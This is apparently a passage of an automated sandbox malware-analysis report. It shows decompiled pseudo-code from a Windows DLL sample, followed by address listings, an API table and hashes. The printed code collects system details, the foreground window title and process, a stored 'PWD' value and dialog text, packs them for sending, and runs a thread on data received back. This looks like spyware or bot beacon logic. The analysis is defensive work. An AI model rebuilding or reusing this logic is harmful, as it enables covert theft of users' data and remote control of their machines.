                                                                                                                        									 *0x6f34043a = _t417 & 0xffffff00 | _t251 == 0x00001000;
                                                                                                                        								}
                                                                                                                        							}
                                                                                                                        						}
                                                                                                                        					}
                                                                                                                        					_push(0x34);
                                                                                                                        					_push(_t481);
                                                                                                                        					L6F33C2EE();
                                                                                                                        					 *((intOrPtr*)(_t481 + 2)) = 0x832eb9b;
                                                                                                                        					 *((short*)(_t481 + 6)) = 0x102;
                                                                                                                        					 *((char*)(_t481 + 8)) = 1;
                                                                                                                        					_t422 = M6F3404E4; // 0x76958bd5
                                                                                                                        					 *((intOrPtr*)(_t481 + 0x18)) = _t422;
                                                                                                                        					_t513 = M6F34050C - _t370; // 0x1
                                                                                                                        					_v2092 = _t370;
                                                                                                                        					_t252 = _t251 & 0xffffff00 | _t513 != 0x00000000;
                                                                                                                        					 *(_t481 + 9) = _t252;
                                                                                                                        					_t377 =  *0x6f3403a4; // 0xa
                                                                                                                        					 *((intOrPtr*)(_t481 + 0x1c)) = _t377;
                                                                                                                        					_t423 =  *0x6f3403a8; // 0x0
                                                                                                                        					 *(_t481 + 0x20) = _t423;
                                                                                                                        					_t514 = M6F3404EC - _t370; // 0x1
                                                                                                                        					 *((char*)(_t481 + 0xa)) = _t252 & 0xffffff00 | _t514 != 0x00000000;
                                                                                                                        					 *((short*)(_t481 + 0x12)) =  *0x6f34043a & 0x000000ff;
                                                                                                                        					_t424 =  *0x6f3403ac; // 0x42ee
                                                                                                                        					 *(_t481 + 0x24) = _t424;
                                                                                                                        					_t254 = M6F340544; // 0x1
                                                                                                                        					 *((char*)(_t481 + 0xc)) = _t254;
                                                                                                                        					_t379 = M6F340548; // 0x1
                                                                                                                        					 *((char*)(_t481 + 0xb)) = _t379;
                                                                                                                        					 *(_t481 + 0xf) = _t370;
                                                                                                                        					 *((char*)(_t481 + 0x11)) = 0x17;
                                                                                                                        					_t255 = M6F3404F8; // 0xa56660
                                                                                                                        					_t467 = E6F33A2F0(_t255, 1,  &_v2092);
                                                                                                                        					_t499 = _t498 + 0xc;
                                                                                                                        					if(_t467 != _t370) {
                                                                                                                        						_t47 = _t481 + 0x34; // 0x34
                                                                                                                        						RtlMoveMemory(_t47, _t467, _v2092);
                                                                                                                        						HeapFree(GetProcessHeap(), _t370, _t467);
                                                                                                                        					}
                                                                                                                        					_t380 = M6F340504; // 0xa59868
                                                                                                                        					_v2092 = _t370;
                                                                                                                        					_t468 = E6F33A2F0(_t380, 1,  &_v2092);
                                                                                                                        					_t500 = _t499 + 0xc;
                                                                                                                        					if(_t468 != _t370) {
                                                                                                                        						_t53 =  &_a49; // 0x35
                                                                                                                        						RtlMoveMemory(_t481 + _t53, _t468, _v2092);
                                                                                                                        						HeapFree(GetProcessHeap(), _t370, _t468);
                                                                                                                        					}
                                                                                                                        					_t469 = _v2092 +  &_a50;
                                                                                                                        					_v2092 = _t370;
                                                                                                                        					_t486 = E6F33A2F0( &_v1900, 1,  &_v2092);
                                                                                                                        					_t501 = _t500 + 0xc;
                                                                                                                        					if(_t486 != _t370) {
                                                                                                                        						RtlMoveMemory(_t469 + _t481, _t486, _v2092);
                                                                                                                        						HeapFree(GetProcessHeap(), _t370, _t486);
                                                                                                                        					}
                                                                                                                        					_t487 = _t469 + _v2092 + 1;
                                                                                                                        					_v2044 = _t487;
                                                                                                                        					_t262 = SetTimer(_t370, _t370, _t370, _t370); // executed
                                                                                                                        					_t470 = _t262;
                                                                                                                        					_v2068 = 0x28;
                                                                                                                        					_v2052 = 1;
                                                                                                                        					_t263 = GetMessageA( &_v1964, _t370, _t370, _t370);
                                                                                                                        					if(_t263 == _t370) {
                                                                                                                        						L90:
                                                                                                                        						VirtualFree(_t481, _t370, 0x8000);
                                                                                                                        						goto L91;
                                                                                                                        					} else {
                                                                                                                        						L15:
                                                                                                                        						if(_v2052 == _t370) {
                                                                                                                        							_t383 = _v1964.message;
                                                                                                                        						} else {
                                                                                                                        							_t383 = 0x113;
                                                                                                                        							_v2052 = _t370;
                                                                                                                        							_v1964.message = 0x113;
                                                                                                                        							_v1964.hwnd = _t370;
                                                                                                                        							_v1964.wParam = _t470;
                                                                                                                        						}
                                                                                                                        						if(_t263 == 0xffffffff || _t383 == 0x10) {
                                                                                                                        							goto L89;
                                                                                                                        						}
                                                                                                                        						if(_t383 == 0x113) {
                                                                                                                        							if(_v1964.hwnd != _t370) {
                                                                                                                        								L87:
                                                                                                                        								DispatchMessageA( &_v1964);
                                                                                                                        								_t263 = GetMessageA( &_v1964, _t370, _t370, _t370);
                                                                                                                        								if(_t263 != _t370) {
                                                                                                                        									_t487 = _v2048;
                                                                                                                        									goto L15;
                                                                                                                        								}
                                                                                                                        								goto L90;
                                                                                                                        							}
                                                                                                                        							L24:
                                                                                                                        							if(_t523 != 0) {
                                                                                                                        								goto L87;
                                                                                                                        							}
                                                                                                                        							KillTimer(_t370, _t470);
                                                                                                                        							E6F336A90( &_v2028, _t370);
                                                                                                                        							_t269 = M6F3404D8; // 0xa55cd8
                                                                                                                        							_t270 = E6F3338A0(_t269, _t370, _t370, 1);
                                                                                                                        							_push(0x1000 - _t487);
                                                                                                                        							_t471 = _t481 + _t487;
                                                                                                                        							_push(_t471);
                                                                                                                        							 *((char*)(_t481 + 0xe)) = _t383 & 0xffffff00 | _t270 != 0x00000000;
                                                                                                                        							L6F33C2EE();
                                                                                                                        							_t271 = M6F3404F8; // 0xa56660
                                                                                                                        							_t386 = M6F340504; // 0xa59868
                                                                                                                        							_v2104 = _t370;
                                                                                                                        							wsprintfW( &_v580, L"%s\\%s", _t386, _t271);
                                                                                                                        							_t273 = M6F3404D0; // 0xa58418
                                                                                                                        							_t503 = _t501 + 0x28;
                                                                                                                        							_t274 = GetPrivateProfileStringW(L"PWD",  &_v572, _t370,  &_v1092, 0x103, _t273); // executed
                                                                                                                        							if(_t274 != 0) {
                                                                                                                        								_t495 = E6F33A2F0( &_v1092, 1,  &_v2096);
                                                                                                                        								_t503 = _t503 + 0xc;
                                                                                                                        								if(_t495 != _t370) {
                                                                                                                        									RtlMoveMemory(_t471, _t495, _v2096);
                                                                                                                        									HeapFree(GetProcessHeap(), _t370, _t495);
                                                                                                                        								}
                                                                                                                        							}
                                                                                                                        							_t275 = _v2096;
                                                                                                                        							_v2092 = _t275 + _v2048 + 1;
                                                                                                                        							 *(_t481 + 0x30) = _t275;
                                                                                                                        							_t276 = GetForegroundWindow(); // executed
                                                                                                                        							_t472 = _t276;
                                                                                                                        							_v1884 = 0;
                                                                                                                        							if(_t472 != _t370) {
                                                                                                                        								GetWindowTextW(_t472,  &_v1884, 0x104);
                                                                                                                        							}
                                                                                                                        							_v2096 = _t370;
                                                                                                                        							_t488 = E6F33A2F0( &_v1884, 1,  &_v2096);
                                                                                                                        							_t504 = _t503 + 0xc;
                                                                                                                        							if(_t488 != _t370) {
                                                                                                                        								RtlMoveMemory(_t481 + _v2092, _t488, _v2096);
                                                                                                                        								HeapFree(GetProcessHeap(), _t370, _t488);
                                                                                                                        							}
                                                                                                                        							_t489 = _v2092 + _v2096 + 1;
                                                                                                                        							_v1884 = 0;
                                                                                                                        							_v2096 = _t370;
                                                                                                                        							if(_t472 != _t370) {
                                                                                                                        								_v2088 = _t370;
                                                                                                                        								GetWindowThreadProcessId(_t472,  &_v2088);
                                                                                                                        								_t344 = _v2088;
                                                                                                                        								if(_t344 > _t370) {
                                                                                                                        									_v1936 = _t344;
                                                                                                                        									asm("pxor xmm0, xmm0");
                                                                                                                        									_v2092 = _t370;
                                                                                                                        									_v1932 = _t370;
                                                                                                                        									_v1928 = 0x18;
                                                                                                                        									asm("movq [esp+0xd0], xmm0");
                                                                                                                        									asm("movq [esp+0xd8], xmm0");
                                                                                                                        									_v1908 = _t370;
                                                                                                                        									_t346 = NtOpenProcess( &_v2092, 0x410,  &_v1928,  &_v1936);
                                                                                                                        									if(_t346 >= 0) {
                                                                                                                        										_push(0x104);
                                                                                                                        										_push( &_v1896);
                                                                                                                        										_push(_t370);
                                                                                                                        										_push(_v2104);
                                                                                                                        										L6F33C38A();
                                                                                                                        										if(_t346 != 0) {
                                                                                                                        											_t479 = E6F33A2F0( &_v1912, 1,  &_v2124);
                                                                                                                        											_t504 = _t504 + 0xc;
                                                                                                                        											if(_t479 != _t370) {
                                                                                                                        												RtlMoveMemory(_t481 + _t489, _t479, _v2124);
                                                                                                                        												HeapFree(GetProcessHeap(), _t370, _t479);
                                                                                                                        											}
                                                                                                                        										}
                                                                                                                        										NtClose(_v2120);
                                                                                                                        									}
                                                                                                                        								}
                                                                                                                        							}
                                                                                                                        							_t281 = 0;
                                                                                                                        							_t473 = _v2096 +  &_v3;
                                                                                                                        							_v2092 = _t473;
                                                                                                                        							_v2096 = 0;
                                                                                                                        							_t535 =  *0x6f340398 - _t370; // 0x900c2
                                                                                                                        							if(_t535 == 0) {
                                                                                                                        								L54:
                                                                                                                        								_t474 = _t473 + _t281 + 1;
                                                                                                                        								_v2068 = 1;
                                                                                                                        								if(_t281 > 1) {
                                                                                                                        									_t406 =  *0x6f340398; // 0x900c2
                                                                                                                        									_t492 = _t474 + _t481;
                                                                                                                        									_t281 = GetDlgItemTextA(_t406, 0x4e83, _t492, 0xfff - _t474); // executed
                                                                                                                        									_v2096 = _t281;
                                                                                                                        									if(_t281 > _t370 &&  *_t481 == 0x2d) {
                                                                                                                        										_t281 = 0;
                                                                                                                        										_v2096 = 0;
                                                                                                                        										 *_t492 = 0;
                                                                                                                        										 *((char*)(_t474 + _t481 + 1)) = 0;
                                                                                                                        									}
                                                                                                                        								}
                                                                                                                        								_v1992 = _t370;
                                                                                                                        								_v1988 = _t370;
                                                                                                                        								_v2000 = _t370;
                                                                                                                        								_v1996 = _t370;
                                                                                                                        								_t475 = _t474 + _t281 + 1;
                                                                                                                        								_v2072 = _t370;
                                                                                                                        								 *(_t481 + 0x2c) = _t370;
                                                                                                                        								 *(_t481 + 0x28) = _t370;
                                                                                                                        								if(_v1964.message != 0x83fe) {
                                                                                                                        									L61:
                                                                                                                        									 *((char*)(_t481 + 0xd)) = 0;
                                                                                                                        									 *(_t481 + 0x14) = _t370;
                                                                                                                        									goto L62;
                                                                                                                        								} else {
                                                                                                                        									_t334 = _v1964.lParam;
                                                                                                                        									if(_t334 == _t370) {
                                                                                                                        										goto L61;
                                                                                                                        									}
                                                                                                                        									 *((char*)(_t481 + 0xd)) =  *((intOrPtr*)(_t334 + 0x10));
                                                                                                                        									 *(_t481 + 0x14) =  *(_t334 + 4);
                                                                                                                        									_v1992 =  *((intOrPtr*)(_t334 + 0x14));
                                                                                                                        									_v1988 =  *(_t334 + 0x18);
                                                                                                                        									_v2072 = _t334;
                                                                                                                        									 *(_t481 + 0x2c) =  *(_t334 + 0x18);
                                                                                                                        									L62:
                                                                                                                        									_push( &_v2088);
                                                                                                                        									_push( &_v2092);
                                                                                                                        									_v2092 = _t370;
                                                                                                                        									_v2088 = _t370;
                                                                                                                        									_v1980.dwHighDateTime = E6F3366E0();
                                                                                                                        									_t284 = _v2088;
                                                                                                                        									_push(1);
                                                                                                                        									_v1996 = _t284;
                                                                                                                        									_v2000 = _v2092;
                                                                                                                        									 *(_t481 + 0x28) = _t284;
                                                                                                                        									 *_t481 = _t475;
                                                                                                                        									E6F3353F0(_v2024, _v2028, _t481, _t475);
                                                                                                                        									_t287 = _v1992;
                                                                                                                        									_t505 = _t504 + 0x1c;
                                                                                                                        									_v2008 = _t481;
                                                                                                                        									_v2004 = _t475;
                                                                                                                        									if(_v1992 != _t370) {
                                                                                                                        										_push(1);
                                                                                                                        										E6F3353F0(_v2024, _v2028, _t287, _v1988);
                                                                                                                        										_t505 = _t505 + 0x14;
                                                                                                                        									}
                                                                                                                        									_push("k");
                                                                                                                        									_push( &_v2028);
                                                                                                                        									_t288 = E6F335690();
                                                                                                                        									_push(_t370);
                                                                                                                        									_t490 = _t288;
                                                                                                                        									E6F3353F0(_v2024, _v2028, _t481, _t475);
                                                                                                                        									_t501 = _t505 + 0x1c;
                                                                                                                        									if(_v1980.dwHighDateTime != _t370) {
                                                                                                                        										VirtualFree(_v2092, _t370, 0x8000); // executed
                                                                                                                        									}
                                                                                                                        									_v2088 = _t370;
                                                                                                                        									if(_t490 <= _t370) {
                                                                                                                        										L77:
                                                                                                                        										_push(8);
                                                                                                                        										_push( &_v1972);
                                                                                                                        										L6F33C2EE();
                                                                                                                        										GetSystemTimeAsFileTime( &_v1980);
                                                                                                                        										_v2052 = _v1980.dwLowDateTime;
                                                                                                                        										_v2048 = _v1980.dwHighDateTime;
                                                                                                                        										_v2092 = _t370;
                                                                                                                        										RtlTimeToSecondsSince1970( &_v2052,  &_v2092);
                                                                                                                        										_t395 = M6F3404CC; // 0xa32d38
                                                                                                                        										_t293 = M6F3404DC; // 0xa55ca8
                                                                                                                        										_v2096 = 0x6467;
                                                                                                                        										_v2094 = 0;
                                                                                                                        										_t294 = GetPrivateProfileIntA(_t293,  &_v2096, _t370, _t395);
                                                                                                                        										if(_t294 != _t370) {
                                                                                                                        											if(_t294 <= _v2100) {
                                                                                                                        												E6F336A90(_t370, _t370);
                                                                                                                        												_t501 = _t501 + 8;
                                                                                                                        											}
                                                                                                                        										} else {
                                                                                                                        											_t302 = _v2028;
                                                                                                                        											_t303 = _t302 & 0x000000ff;
                                                                                                                        											if(_t302 == 0) {
                                                                                                                        												_t303 = 1;
                                                                                                                        											}
                                                                                                                        											wsprintfA( &_v1372, "%lu", _t303 * 0xe10 + _v2100);
                                                                                                                        											_t442 = M6F3404CC; // 0xa32d38
                                                                                                                        											_t501 = _t501 + 0xc;
                                                                                                                        											_t443 = M6F3404DC; // 0xa55ca8
                                                                                                                        											WritePrivateProfileStringA(_t443,  &_v2088,  &_v1364, _t442);
                                                                                                                        										}
                                                                                                                        										goto L83;
                                                                                                                        									} else {
                                                                                                                        										if(_t490 >= 0x12) {
                                                                                                                        											_push(_t370);
                                                                                                                        											E6F3353F0(_v2024, _v2028, _v1984, _t490);
                                                                                                                        											_t476 = _v1984;
                                                                                                                        											_t501 = _t501 + 0x14;
                                                                                                                        											if( *_t476 == 0x832eb9b) {
                                                                                                                        												_t314 = M6F3404CC; // 0xa32d38
                                                                                                                        												_t445 = M6F3404DC; // 0xa55ca8
                                                                                                                        												_v2088 = 1;
                                                                                                                        												_v2076 = 0x6467;
                                                                                                                        												_v2074 = 0;
                                                                                                                        												WritePrivateProfileStringA(_t445,  &_v2076, _t370, _t314); // executed
                                                                                                                        												_t316 =  *(_t476 + 4) & 0x0000ffff;
                                                                                                                        												 *0x6f340000 = _t316;
                                                                                                                        												if(_t316 < 0xa) {
                                                                                                                        													 *0x6f340000 = 0x3c;
                                                                                                                        												}
                                                                                                                        												_t317 =  *(_t476 + 0xc) & 0x0000ffff;
                                                                                                                        												if(_t317 <= _t370) {
                                                                                                                        													_push(_t370);
                                                                                                                        													_push(_t370);
                                                                                                                        													_push(_t370);
                                                                                                                        													_push(_t370);
                                                                                                                        												} else {
                                                                                                                        													_push( *(_t476 + 0xa) & 0x000000ff);
                                                                                                                        													_t329 = _v1984;
                                                                                                                        													_push( *(_t476 + 0xb) & 0x000000ff);
                                                                                                                        													_push(_t317 + _t329 + 0x13);
                                                                                                                        													_push(_t329 + 0x12);
                                                                                                                        												}
                                                                                                                        												E6F3369C0();
                                                                                                                        												_t501 = _t501 + 0x10;
                                                                                                                        												if( *((intOrPtr*)(_t476 + 0x10)) > _t370) {
                                                                                                                        													_t322 = HeapAlloc(GetProcessHeap(), 8, 0x1c);
                                                                                                                        													_v0 =  *((intOrPtr*)(_t476 + 6));
                                                                                                                        													_t477 = E6F33A360(( *(_t476 + 0xc) & 0x0000ffff) + _v1984 + ( *(_t476 + 0xe) & 0x0000ffff) + 0x14, 1, 0);
                                                                                                                        													_t324 = E6F33A2F0(_t477, 0, 0);
                                                                                                                        													_t501 = _t501 + 0x18;
                                                                                                                        													_a8 = _t324;
                                                                                                                        													HeapFree(GetProcessHeap(), 0, _t477);
                                                                                                                        													CloseHandle(CreateThread(0, 0, E6F335B40, _t322, 0, 0));
                                                                                                                        													Sleep(0x1f4);
                                                                                                                        													_t370 = 0;
                                                                                                                        												}
                                                                                                                        											}
                                                                                                                        										}
                                                                                                                        										HeapFree(GetProcessHeap(), _t370, _v1984);
                                                                                                                        										if(_v2088 != _t370) {
                                                                                                                        											L83:
                                                                                                                        											_t295 = _v2088;
                                                                                                                        											if(_t295 != _t370) {
                                                                                                                        												_t299 =  *_t295;
                                                                                                                        												if(_t299 != _t370) {
                                                                                                                        													SetEvent(_t299);
                                                                                                                        												}
                                                                                                                        											}
                                                                                                                        											_t296 =  *0x6f340000; // 0x3c
                                                                                                                        											_t298 = SetTimer(_t370, _t370, _t296 * 0x3e8, _t370); // executed
                                                                                                                        											_t470 = _t298;
                                                                                                                        											goto L87;
                                                                                                                        										} else {
                                                                                                                        											goto L77;
                                                                                                                        										}
                                                                                                                        									}
                                                                                                                        								}
                                                                                                                        							} else {
                                                                                                                        								_t493 = 0;
                                                                                                                        								if(_v2068 <= _t370) {
                                                                                                                        									goto L54;
                                                                                                                        								}
                                                                                                                        								_v2072 = 0xfff - _t473;
                                                                                                                        								_t478 = _t473 + _t481;
                                                                                                                        								L42:
                                                                                                                        								L42:
                                                                                                                        								if(_t493 > 0) {
                                                                                                                        									Sleep(0x1f4); // executed
                                                                                                                        								}
                                                                                                                        								_t407 =  *0x6f340398; // 0x900c2
                                                                                                                        								_t340 = GetDlgItemTextA(_t407, 0x4e82, _t478, _v2072); // executed
                                                                                                                        								_t373 = _t340;
                                                                                                                        								if( *_t481 == 0x2d || _t373 < 0xb) {
                                                                                                                        									goto L46;
                                                                                                                        								}
                                                                                                                        								_t494 = 0;
                                                                                                                        								if(_t373 <= 0) {
                                                                                                                        									L52:
                                                                                                                        									_t281 = _t373;
                                                                                                                        									_v2096 = _t281;
                                                                                                                        									L53:
                                                                                                                        									_t473 = _v2092;
                                                                                                                        									_t370 = 0;
                                                                                                                        									goto L54;
                                                                                                                        								} else {
                                                                                                                        									goto L49;
                                                                                                                        								}
                                                                                                                        								do {
                                                                                                                        									L49:
                                                                                                                        									if(StrTrimA( &(_t478[_t494]), " ") != 0) {
                                                                                                                        										_t373 = _t373 - 1;
                                                                                                                        									}
                                                                                                                        									_t494 =  &_v3;
                                                                                                                        								} while (_t494 < _t373);
                                                                                                                        								goto L52;
                                                                                                                        								L46:
                                                                                                                        								_t281 = 0;
                                                                                                                        								_t493 =  &_v3;
                                                                                                                        								_v2096 = 0;
                                                                                                                        								 *_t478 = 0;
                                                                                                                        								if(_t493 < _v2068) {
                                                                                                                        									goto L42;
                                                                                                                        								}
                                                                                                                        								goto L53;
                                                                                                                        							}
                                                                                                                        						}
                                                                                                                        						_t523 = _t383 - 0x83fe;
                                                                                                                        						goto L24;
                                                                                                                        						L89:
                                                                                                                        						KillTimer(_t370, _t470);
                                                                                                                        						goto L90;
                                                                                                                        					}
                                                                                                                        				}
                                                                                                                        			}

                                                                                                                        0x6f336e8a
                                                                                                                        0x6f336e8f
                                                                                                                        0x6f336e96
                                                                                                                        0x6f336e9c
                                                                                                                        0x6f336ea0
                                                                                                                        0x6f336ea6
                                                                                                                        0x6f336ea9
                                                                                                                        0x6f336eaf
                                                                                                                        0x6f336eb3
                                                                                                                        0x6f336eb6
                                                                                                                        0x6f336eb9
                                                                                                                        0x6f336ebf
                                                                                                                        0x6f336ec2
                                                                                                                        0x6f336ec8
                                                                                                                        0x6f336ecb
                                                                                                                        0x6f336ed4
                                                                                                                        0x6f336ede
                                                                                                                        0x6f336ee2
                                                                                                                        0x6f336ee8
                                                                                                                        0x6f336eeb
                                                                                                                        0x6f336ef0
                                                                                                                        0x6f336ef3
                                                                                                                        0x6f336efe
                                                                                                                        0x6f336f01
                                                                                                                        0x6f336f05
                                                                                                                        0x6f336f09
                                                                                                                        0x6f336f16
                                                                                                                        0x6f336f18
                                                                                                                        0x6f336f1d
                                                                                                                        0x6f336f25
                                                                                                                        0x6f336f29
                                                                                                                        0x6f336f37
                                                                                                                        0x6f336f37
                                                                                                                        0x6f336f3d
                                                                                                                        0x6f336f4f
                                                                                                                        0x6f336f58
                                                                                                                        0x6f336f5a
                                                                                                                        0x6f336f5f
                                                                                                                        0x6f336f67
                                                                                                                        0x6f336f6c
                                                                                                                        0x6f336f7a
                                                                                                                        0x6f336f7a
                                                                                                                        0x6f336f93
                                                                                                                        0x6f336f97
                                                                                                                        0x6f336fa0
                                                                                                                        0x6f336fa2
                                                                                                                        0x6f336fa7
                                                                                                                        0x6f336fb3
                                                                                                                        0x6f336fc1
                                                                                                                        0x6f336fc1
                                                                                                                        0x6f336fce
                                                                                                                        0x6f336fd3
                                                                                                                        0x6f336fd7
                                                                                                                        0x6f336fe8
                                                                                                                        0x6f336fea
                                                                                                                        0x6f336ff2
                                                                                                                        0x6f336ffa
                                                                                                                        0x6f337002
                                                                                                                        0x6f33776f
                                                                                                                        0x6f337776
                                                                                                                        0x00000000
                                                                                                                        0x6f337008
                                                                                                                        0x00000000
                                                                                                                        0x6f337014
                                                                                                                        0x6f337018
                                                                                                                        0x6f33703a
                                                                                                                        0x6f33701a
                                                                                                                        0x6f33701a
                                                                                                                        0x6f33701f
                                                                                                                        0x6f337023
                                                                                                                        0x6f33702a
                                                                                                                        0x6f337031
                                                                                                                        0x6f337031
                                                                                                                        0x6f337044
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f337059
                                                                                                                        0x6f33706a
                                                                                                                        0x6f33773e
                                                                                                                        0x6f337746
                                                                                                                        0x6f337757
                                                                                                                        0x6f33775f
                                                                                                                        0x6f337010
                                                                                                                        0x00000000
                                                                                                                        0x6f337010
                                                                                                                        0x00000000
                                                                                                                        0x6f337765
                                                                                                                        0x6f337077
                                                                                                                        0x6f337077
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f33707f
                                                                                                                        0x6f33708b
                                                                                                                        0x6f337090
                                                                                                                        0x6f33709a
                                                                                                                        0x6f3370ae
                                                                                                                        0x6f3370af
                                                                                                                        0x6f3370b2
                                                                                                                        0x6f3370b3
                                                                                                                        0x6f3370b6
                                                                                                                        0x6f3370bb
                                                                                                                        0x6f3370c0
                                                                                                                        0x6f3370d5
                                                                                                                        0x6f3370d9
                                                                                                                        0x6f3370df
                                                                                                                        0x6f3370e4
                                                                                                                        0x6f337103
                                                                                                                        0x6f33710b
                                                                                                                        0x6f337121
                                                                                                                        0x6f337123
                                                                                                                        0x6f337128
                                                                                                                        0x6f337131
                                                                                                                        0x6f33713f
                                                                                                                        0x6f33713f
                                                                                                                        0x6f337128
                                                                                                                        0x6f337145
                                                                                                                        0x6f337151
                                                                                                                        0x6f337155
                                                                                                                        0x6f337158
                                                                                                                        0x6f33715e
                                                                                                                        0x6f337162
                                                                                                                        0x6f33716c
                                                                                                                        0x6f33717c
                                                                                                                        0x6f33717c
                                                                                                                        0x6f337191
                                                                                                                        0x6f33719a
                                                                                                                        0x6f33719c
                                                                                                                        0x6f3371a1
                                                                                                                        0x6f3371b0
                                                                                                                        0x6f3371be
                                                                                                                        0x6f3371be
                                                                                                                        0x6f3371ce
                                                                                                                        0x6f3371d2
                                                                                                                        0x6f3371da
                                                                                                                        0x6f3371e0
                                                                                                                        0x6f3371ec
                                                                                                                        0x6f3371f0
                                                                                                                        0x6f3371f6
                                                                                                                        0x6f3371fc
                                                                                                                        0x6f337212
                                                                                                                        0x6f337222
                                                                                                                        0x6f337227
                                                                                                                        0x6f33722b
                                                                                                                        0x6f337232
                                                                                                                        0x6f33723d
                                                                                                                        0x6f337246
                                                                                                                        0x6f33724f
                                                                                                                        0x6f337256
                                                                                                                        0x6f33725d
                                                                                                                        0x6f337263
                                                                                                                        0x6f33726f
                                                                                                                        0x6f337270
                                                                                                                        0x6f337271
                                                                                                                        0x6f337272
                                                                                                                        0x6f337279
                                                                                                                        0x6f33728f
                                                                                                                        0x6f337291
                                                                                                                        0x6f337296
                                                                                                                        0x6f3372a2
                                                                                                                        0x6f3372b0
                                                                                                                        0x6f3372b0
                                                                                                                        0x6f337296
                                                                                                                        0x6f3372bb
                                                                                                                        0x6f3372bb
                                                                                                                        0x6f33725d
                                                                                                                        0x6f3371fc
                                                                                                                        0x6f3372c4
                                                                                                                        0x6f3372c6
                                                                                                                        0x6f3372ca
                                                                                                                        0x6f3372ce
                                                                                                                        0x6f3372d2
                                                                                                                        0x6f3372d8
                                                                                                                        0x6f337367
                                                                                                                        0x6f337367
                                                                                                                        0x6f33736b
                                                                                                                        0x6f337376
                                                                                                                        0x6f337378
                                                                                                                        0x6f337386
                                                                                                                        0x6f337390
                                                                                                                        0x6f337396
                                                                                                                        0x6f33739c
                                                                                                                        0x6f3373a3
                                                                                                                        0x6f3373a5
                                                                                                                        0x6f3373a9
                                                                                                                        0x6f3373ac
                                                                                                                        0x6f3373ac
                                                                                                                        0x6f33739c
                                                                                                                        0x6f3373bb
                                                                                                                        0x6f3373bf
                                                                                                                        0x6f3373c6
                                                                                                                        0x6f3373ca
                                                                                                                        0x6f3373ce
                                                                                                                        0x6f3373d2
                                                                                                                        0x6f3373d6
                                                                                                                        0x6f3373d9
                                                                                                                        0x6f3373dc
                                                                                                                        0x6f337412
                                                                                                                        0x6f337412
                                                                                                                        0x6f337416
                                                                                                                        0x00000000
                                                                                                                        0x6f3373de
                                                                                                                        0x6f3373de
                                                                                                                        0x6f3373e7
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f3373ec
                                                                                                                        0x6f3373f2
                                                                                                                        0x6f3373f8
                                                                                                                        0x6f3373ff
                                                                                                                        0x6f337409
                                                                                                                        0x6f33740d
                                                                                                                        0x6f337419
                                                                                                                        0x6f33741d

                                                                                                                        APIs
                                                                                                                        • RtlZeroMemory.NTDLL(?,00000014), ref: 6F336D67
                                                                                                                        • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000004), ref: 6F336D7B
                                                                                                                        • RtlZeroMemory.NTDLL(?,00000014), ref: 6F336D95
                                                                                                                        • GetLocaleInfoW.KERNEL32(00000400,0000005A,?,00000009,?,00000014), ref: 6F336DAB
                                                                                                                        • CharLowerW.USER32(?), ref: 6F336DB9
                                                                                                                        • RtlZeroMemory.NTDLL(6F3403A0,0000009C), ref: 6F336DC9
                                                                                                                        • RtlGetNtVersionNumbers.NTDLL ref: 6F336DF3
                                                                                                                        • RtlZeroMemory.NTDLL(00000000,00000034), ref: 6F336E8A
                                                                                                                        • RtlMoveMemory.NTDLL(00000034,00000000,?), ref: 6F336F29
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,00000034,00000000,?), ref: 6F336F30
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F336F37
                                                                                                                        • RtlMoveMemory.NTDLL(00000035,00000000,?), ref: 6F336F6C
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,00000035,00000000,?), ref: 6F336F73
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F336F7A
                                                                                                                        • RtlMoveMemory.NTDLL(?,00000000,?), ref: 6F336FB3
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,?), ref: 6F336FBA
                                                                                                                        • HeapFree.KERNEL32(00000000,?,00000000,?), ref: 6F336FC1
                                                                                                                          • Part of subcall function 6F331DB0: lstrlenA.KERNEL32(00000000,00000000), ref: 6F331E3E
                                                                                                                          • Part of subcall function 6F331DB0: RtlComputeCrc32.NTDLL(00000000,00000000,00000000), ref: 6F331E48
                                                                                                                        • SetTimer.USER32(00000000,00000000,00000000,00000000), ref: 6F336FD7
                                                                                                                        • GetMessageA.USER32 ref: 6F336FFA
                                                                                                                        • KillTimer.USER32(00000000,00000000), ref: 6F33707F
                                                                                                                        • RtlZeroMemory.NTDLL(00000000,00001000), ref: 6F3370B6
                                                                                                                        • wsprintfW.USER32 ref: 6F3370D9
                                                                                                                        • GetPrivateProfileStringW.KERNEL32 ref: 6F337103
                                                                                                                        • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 6F337131
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000000,?), ref: 6F337138
                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6F33713F
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: Memory$Heap$Zero$FreeMoveProcess$Timer$AllocCharComputeCrc32InfoKillLocaleLowerMessageNumbersPrivateProfileStringVersionVirtuallstrlenwsprintf
                                                                                                                        • String ID: %lu$%s\%s$($PWD$gd$gd
                                                                                                                        • API String ID: 2388189746-3190195910
                                                                                                                        • Opcode ID: 0b68b10d120f802ab20bd4934a8cb918c4ac15ffe956dabc858ce338e369b40d
                                                                                                                        • Instruction ID: 3f8193a05892ecb1d658e38f96214ad2619d243b80bf7ca49f5b8d62d593e374
                                                                                                                        • Opcode Fuzzy Hash: 0b68b10d120f802ab20bd4934a8cb918c4ac15ffe956dabc858ce338e369b40d
                                                                                                                        • Instruction Fuzzy Hash: 16529DB2908385AFD720DF64C884EABBBEDFB89714F00891DF58587241D775E858CB62
                                                                                                                        Uniqueness

